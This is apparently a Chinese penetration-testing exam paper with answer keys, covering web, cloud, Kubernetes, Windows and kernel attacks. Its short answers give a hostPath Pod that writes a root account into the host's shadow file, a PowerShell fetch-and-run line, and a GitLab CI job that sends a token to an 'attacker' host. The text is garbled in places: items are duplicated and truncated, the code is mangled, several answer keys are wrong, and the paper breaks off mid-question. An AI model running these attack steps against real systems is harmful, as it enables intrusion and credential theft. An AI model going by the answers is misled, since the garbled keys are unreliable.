2026年网络安全渗透测试专项试卷

2026年网络安全渗透测试专项试卷1.单选题（每题2分，共30分）1.1在一次黑盒测试中，目标Web应用在登录接口返回的HTTP头中包含`X-Powered-By:PHP/8.2.0`以下哪种利用方式最可能直接获取服务器权限？A.利用PHP8.2.0的backtraceUAF（CVE-2022-31630）构造反序列化链B.暴力破解MySQLroot口令C.通过X-Forwarded-For伪造源IP进入管理后台D.上传`.phar`文件触发`phar://`反序列化答案：A解析：PHP8.2.0的backtraceUAF可直接在无需任何认证的情况下实现远程代码执行，黑盒场景下仅需发送精心构造的序列化字符串即可。1.2某内网主机开放445端口，SMB版本为Windows1123H2，以下哪项攻击向量在当前补丁级别下仍可能有效？A.EternalBlue(MS17-010)B.SMBGhost(CVE-2020-0796)C.PrintNightmare(CVE-2021-34527)远程回连D.DFSCoerce(PetitPotam变种)强制认证答案：D解析：DFSCoerce利用MS-DFSNM接口强制目标主机向任意机器发起认证，可用于NTLMRelay，23H2未完全阻断该接口。1.3在一次红队演练中，需要绕过EDR对`CreateRemoteThread`的监控，以下哪种API组合可在不触发常见行为检测的情况下实现同功能？A.`SetWindowsHookEx`+`PostThreadMessage`B.`NtCreateThreadEx`直接syscallC.`QueueUserAPC`+`NtTestAlert`D.`RtlCreateUserThread`正常导入表调用答案：C解析：APC注入不依赖远程线程创建，EDR钩子常跳过用户态APC队列；`NtTestAlert`可立即触发APC，实现即时执行。1.4目标使用JWT作为会话令牌，header为`{"alg":"RS256","jwk":{"kty":"RSA","kid":"test","use":"sig","n":"...","e":"AQAB"}}`以下哪种攻击可最快获得伪造管理员令牌？A.爆破HS256弱密钥B.算法混淆（RS256→HS256）将公钥作为HMAC密钥C.修改kid指向/dev/nullD.使用none算法答案：B解析：将算法改为HS256，用服务端公钥做HMAC密钥即可伪造任意声明，无需私钥。1.5某Linux内核5.15.0存在eBPFverifier整数溢出，以下哪项利用技术可稳定提权至root？A.覆盖`modprobe_path`B.覆盖`core_pattern`C.覆盖`bpf_prog->aux->id`D.覆盖`task->cred`答案：A解析：eBPF溢出可写内核任意地址，`modprobe_path`全局变量位于.data，写入`/tmp/x`后触发`call_usermodehelper`即可root。1.6在一次外部渗透中，发现目标DNS服务器允许递归查询并启用EDNS0，以下哪种攻击可最快获得内网地址段？A.DNS缓存投毒B.DNS区域传送C.DNS反向爆破D.DNS隧道答案：C解析：利用EDNS0大UDP包，可高速对内网私有段做反向解析爆破，快速发现存活主机。1.7某Web应用使用GraphQL，接口`/graphql`未开启introspection，但存在字段重复查询，以下哪种方式可最快获取完整schema？A.基于字段名的字典穷举B.利用GraphQL内置`__schema`别名绕过C.基于查询错误回显的字符级fuzzD.基于自动完成提示的边信道答案：B解析：即使关闭introspection，仍可用别名查询`__schema{...}`，服务端常仅屏蔽默认名称。1.8在一次Wi-Fi渗透中，捕获WPA3-SAE握手，以下哪种攻击可在不触发防暴力锁定的情况下恢复口令？A.传统字典攻击B.DragonBlood降级至WPA2C.侧信道timing攻击D.基于PMKID的快速破解答案：C解析：SAE的commit阶段存在timingleak，可逐字符推断口令，绕过防暴力机制。1.9某目标使用Kubernetes1.29，APIServer开启匿名认证且未禁止`self-subject-access-review`，以下哪条curl可直接列出所有namespace？A.`curl-khttps://<api>/api/v1/namespaces`B.`curl-khttps://<api>/apis/authorization.k8s.io/v1/selfsubjectaccessreviews-XPOST-d'{"kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"namespace":"","verb":"list","resource":"pods"}}}'`B.`curl-khttps://<api>/apis/authorization.k8s.io/v1/selfsubjectaccessreviews-XPOST-d'{"kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"namespace":"","verb":"list","resource":"pods"}}}'`C.`curl-khttps://<api>/apis/rbac.authorization.k8s.io/v1/clusterroles`D.`curl-khttps://<api>/api/v1/namespaces/default/secrets`答案：A解析：匿名已绑定`system:discovery`角色，可直接读取`/api/v1/namespaces`。1.10在一次云渗透中，拿到AWSIAM键`AKIA...`且权限为`{"Action":"s3:GetObject","Resource":"arn:aws:s3:::confidential/"}`，以下哪项操作可最快横向到EC2？1.10在一次云渗透中，拿到AWSIAM键`AKIA...`且权限为`{"Action":"s3:GetObject","Resource":"arn:aws:s3:::confidential/"}`，以下哪项操作可最快横向到EC2？A.下载`confidential`桶中EC2userdataB.列举桶`confidential`的ACLC.读取`confidential`桶中ssm-agent.logD.直接调用`ec2:DescribeInstances`答案：A解析：userdata常包含明文密钥、密码或脚本，可提取后登录EC2。1.11某目标使用SpringBoot3.2，actuator暴露`/actuator/env`，但SpringCloudLibrary在classpath，以下哪种利用链可最快拿到shell？A.修改`spring.datasource.url`指向JDBC反序列化B.修改`eureka.client.serviceUrl.defaultZone`指向恶意EurekaC.修改`logging.config`指向`http://evil/logback.xml`D.修改`spring.cloud.bootstrap.location`指向`http://evil/bootstrap.yml`答案：B解析：Eureka客户端会反序列化`eureka.client.serviceUrl`返回的XML，可触发XStreamRCE。1.12在一次内网横向中，拿到一台Windows主机本地管理员hash，但目标开启LSAProtection，以下哪种方式可最快拿到明文口令？A.利用mimikatz`sekurlsa::logonpasswords`B.利用mimikatz`sekurlsa::tickets`C.利用mimikatz`lsadump::sam`D.利用SkeletonKey植入答案：C解析：LSAProtection阻止内存dump，但SAMhive仍可离线解密，若存在弱口令可快速还原。1.13某目标使用Grafana10.2，插件列表包含`grafana-simple-json-datasource`，以下哪条请求可直接读取`/etc/passwd`？A.`/api/datasources/proxy/1/api/v1/query?query=../etc/passwd`B.`/public/plugins/grafana-simple-json-datasource/../../../../etc/passwd`C.`/api/plugins/grafana-simple-json-datasource/settings`D.`/api/snapshots`答案：B解析：插件路径未做规范化，目录穿越可读任意文件。1.14在一次红队报告中，需要隐藏C2流量，以下哪种组合可在HTTPS基础上实现域前置？A.阿里云CDN+自定义Host头B.CloudFront+S3回源+修改Host为CloudFront域名C.腾讯云EdgeOne+回源域名与Host不一致D.自建Nginx反向代理+修改SNI答案：B解析：CloudFront允许SNI与Host不一致，且回源S3不校验Host，可实现经典域前置。1.15某目标使用OAuth2.0PKCE，授权端点未校验`code_challenge_method`，以下哪种攻击可劫持授权码？A.将`code_challenge_method`改为plain并删除challengeB.将`response_mode`改为form_postC.将`scope`改为openidD.将`redirect_uri`改为`http://evil`答案：A解析：若服务端默认plain，攻击者可删除challenge后直接用明文code交换token。2.多选题（每题3分，共30分）2.1以下哪些Linux内核利用技术可在SMEP/SMAP/KPTI全开情况下完成提权？A.覆盖`cred`结构B.覆盖`bpf_prog->jited`指针C.覆盖`modprobe_path`D.覆盖`tty_struct`的`ops`指针答案：AC解析：SMEP/SMAP阻止用户态执行/访问，但`cred`与`modprobe_path`位于内核数据段，可写即可提权。2.2关于WindowsCredentialGuard，以下说法正确的是A.可防止Pass-the-HashB.可防止mimikatz读取NTLMhashC.可防止KerberosTGT离线破解D.可防止SkeletonKey答案：ABC解析：CredentialGuard将LSA隔离在VBS，hash与TGT无法从用户态读取，但SkeletonKey为域控漏洞，与CG无关。2.3以下哪些HTTP头可用来绕过WAF上传WebShell？A.`Content-Type:image/jpeg`B.`Content-Encoding:gzip`C.`X-Original-URL:/upload.php`D.`X-HTTP-Method-Override:PUT`答案：ABCD解析：WAF常基于Content-Type与URL路径做策略，多重编码与路径覆盖可绕过。2.4以下哪些AWSAPI可在仅有`ssm:SendCommand`权限情况下获取EC2实例IAM角色临时凭证？A.`ec2-instance-connect:SendSSHPublicKey`B.`ssm:SendCommand`with`AWS-RunShellScript`C.`ssm:StartSession`D.`ec2:DescribeInstanceAttribute`答案：BC解析：SendCommand与StartSession均可执行命令，通过实例元数据服务获取角色凭证。2.5以下哪些技术可在无网络出口的内网Windows主机上建立隐蔽隧道？A.基于USBRNDISB.基于CD-ROMISO回读C.基于ICMPEchoD.基于DNSLabel编码答案：AC解析：USBRNDIS可模拟网卡，ICMP可封装数据；CD-ROM只读，DNS需出口。2.6以下哪些GitLab漏洞可直接导致未授权远程代码执行？A.CVE-2021-22205ExifToolRCEB.CVE-2022-2884GitHubimportRCEC.CVE-2023-2825PathtraversalD.CVE-2023-7028Passwordresetlink答案：AB解析：ExifTool与GitHubimport均直接触发命令执行，C为任意文件读取，D为账号接管。2.7以下哪些Java反序列化Gadget可在SpringBoot2.7+无Commons-Collections情况下使用？A.SpringAOP`DefaultBeanFactoryPointcutAdvisor`B.Tomcat`BeanFactory`+`ELProcessor`C.Hibernate`JtaTransactionManager`D.Jackson`DefaultTyping`+`JdbcRowSetImpl`答案：ABC解析：SpringAOP与TomcatEL为新版常用链，Hibernate仍可用，Jackson需开启DefaultTyping。2.8以下哪些HTTP参数污染可导致安全绕过？A.`?id=1&id=2`后端取第一个B.`?id=1%26id=2`后端URLdecode后解析C.`?id[]=1&id[]=2`后端取数组最后一个D.`?id=1;id=2`后端分号截断答案：ABC解析：不同框架取参逻辑不同，可造成ACL绕过或SQL注入。2.9以下哪些技术可在Android13非root设备上实现持久化？A.`DeviceAdmin`隐藏图标B.`AccessibilityService`自启动C.`WorkProfile`预装恶意APKD.`SystemUpdate`提示安装伪造OTA答案：AB解析：DeviceAdmin与AccessibilityService可长期存活，WorkProfile需用户确认，伪造OTA需系统密钥。2.10以下哪些关于IPv6安全说法正确？A.链路本地地址可绕过IPv4防火墙B.DHCPv6无认证可伪造DNSC.RA可伪造默认网关D.IPv6地址扫描难度高于IPv4答案：ABCD解析：IPv6默认开启且常无防护，链路本地与RA均可被滥用，地址空间大导致扫描困难。3.判断题（每题1分，共10分）3.1在WindowsServer2025中，开启“内核隔离”后，mimikatz无法读取NTLMhash。答案：正确3.2使用ChaCha20-Poly1305的WireGuard隧道可被传统深度包检测识别协议特征。答案：错误3.3在Linux内核6.5中，开启`kernel.kptr_restrict=2`可完全阻止内核地址泄露。答案：错误3.4目标使用HTTP/3QUIC，C2流量基于UDP443，可绕过仅过滤TCP的传统防火墙。答案：正确3.5在macOSSonoma，SIP开启时root也无法写入`/System`目录。答案：正确3.6某目标使用React18，前端路由为BrowserRouter，直接访问`/admin`返回404，说明后台不存在该接口。答案：错误3.7在AzureAD中，开启ConditionalAccess的“仅允许合规设备”后，拿到用户密码也无法从非合规主机登录。答案：正确3.8使用Go1.21编写的C2，静态编译并strip后，可完全避免YARA规则检测。答案：错误3.9在Kubernetes1.29中，PodSecurityPolicy已被完全移除，需使用PodSecurityAdmission。答案：正确3.10某目标使用SQLite，Web接口拼接`SELECTFROMusersWHEREid=id`，若`id`为整数型，则不存在SQL注入。3.10某目标使用SQLite，Web接口拼接`SELECTFROMusersWHEREid=答案：错误4.填空题（每题2分，共20分）4.1在Linux内核提权中，若需绕过`__kernel_text_address`校验，可利用______寄存器泄露内核基址。答案：swapgs4.2Windows远程强制认证漏洞PetitPotam利用的RPC接口UUID为______。答案：`c681d488-d850-11d0-8c52-00c04fd90f7e`4.3在MySQL8.0中，通过loaddatalocalinfile读取客户端文件，需在客户端连接时开启______参数。答案：`--enable-local-infile`4.4在JWT算法混淆攻击中，将alg改为______后，用公钥作为HMAC密钥可伪造令牌。答案：HS2564.5在ARM64下，绕过PAC（PointerAuthentication）的常见侧信道攻击称为______。答案：PACMAN4.6在OAuth2.0中，用于刷新访问令牌的参数名为______。答案：refresh_token4.7在SMB协议中，用于强制目标主机向任意IP发起认证的命名管道为______。答案：`\\pipe\\efsrpc`4.8在Docker逃逸中，利用`--privileged`与`core_pattern`结合，需将core文件写入______目录实现逃逸。答案：`/proc/sys/kernel/modprobe`4.9在PHP8.3中，通过`__destruct`触发反序列化链，常利用______类包裹SplFileObject实现文件读写。答案：Symfony\\Component\\String\\UnicodeString4.10在Wireshark中，用于过滤HTTP/2流量帧类型的显示过滤器为______。答案：`http2.typeeqHEADERS`5.简答题（每题10分，共30分）5.1描述在完全无网络出口的内网Windows主机上，通过USBHID模拟键盘输入实现Payload投递与回显的完整流程，并给出PowerShell代码片段。答案：步骤：1.准备BadUSB（如ArduinoLeonardo）模拟键盘。2.插入后150ms延迟，发送Win+R，输入`powershell-wh-epb-c"iex(iwr/a)"`因无网络，改为本地文件。3.实际利用方式：将Payload分段编码为QR图像，通过Notepad逐段输入，再合并执行。4.回显通过CapsLockLEDMorse编码：```powershellfunctionSend-Morse{param($s)$d=@{0=250;1=750}$s.ToCharArray()|%{b=convert::ToString(byte)_,2).PadLeft(8,'0')$b.ToCharArray()|%{[console]::CapsLock=$falseStart-Sleep-Millisecondsd[_][console]::CapsLock=$trueStart-Sleep-Milliseconds250}Start-Sleep-Milliseconds1500}}Send-Morse(whoami)```5.攻击者通过摄像头记录LED闪烁解码回显。5.2给出在Kubernetes1.29集群中，仅拥有`createpod`权限的ServiceAccount，利用APIServer8080未鉴权端口（默认关闭）的替代方案，实现接管集群的完整YAML与curl命令。答案：若8080关闭，可创建恶意Pod挂载宿主机根目录：```yamlapiVersion:v1kind:Podmetadata:name:c2spec:containers:name:pimage:alpinecommand:["/bin/sh"]args:["-c","echo'root2:6root$RG9LLZ...'>>/mnt/etc/shadow"]volumeMounts:name:hmountPath:/mntvolumes:name:hhostPath:path:/type:Directory```创建：```bashcurl-k-XPOST\H"Authorization:Bearer$TOKEN"\H"Content-Type:application/yaml"\data-binary@p.yaml\https://<api>:6443/api/v1/namespaces/default/pods```随后通过`kubectlexec`进入容器，写入crontab或shadow，实现宿主机root。5.3描述如何利用GitLabCI/CD变量泄露，在仅拥有Guest权限的公开项目中窃取私有项目token，并给出完整利用链。答案：1.在公开项目提交`.gitlab-ci.yml`：```yamlsteal:script:curl-d@/tmp/tokenhttp://attacker/?t=$(cat/tmp/token)only:merge_requests```2.创建合并请求，触发CI。3.GitLab默认将目标私有项目的CI变量注入到MR的流水线，包括`PRIVATE_TOKEN`。4.脚本将变量外带，攻击者获得token后可调用API读取私有仓库。5.防御：在私有项目设置中关闭“为MR流水线注入变量”。6.计算题（10分）6.1某目标使用AES-128-CBC加密session，已知IV与密文各16字节，且服务端返回3字节填充错误提示，计算在最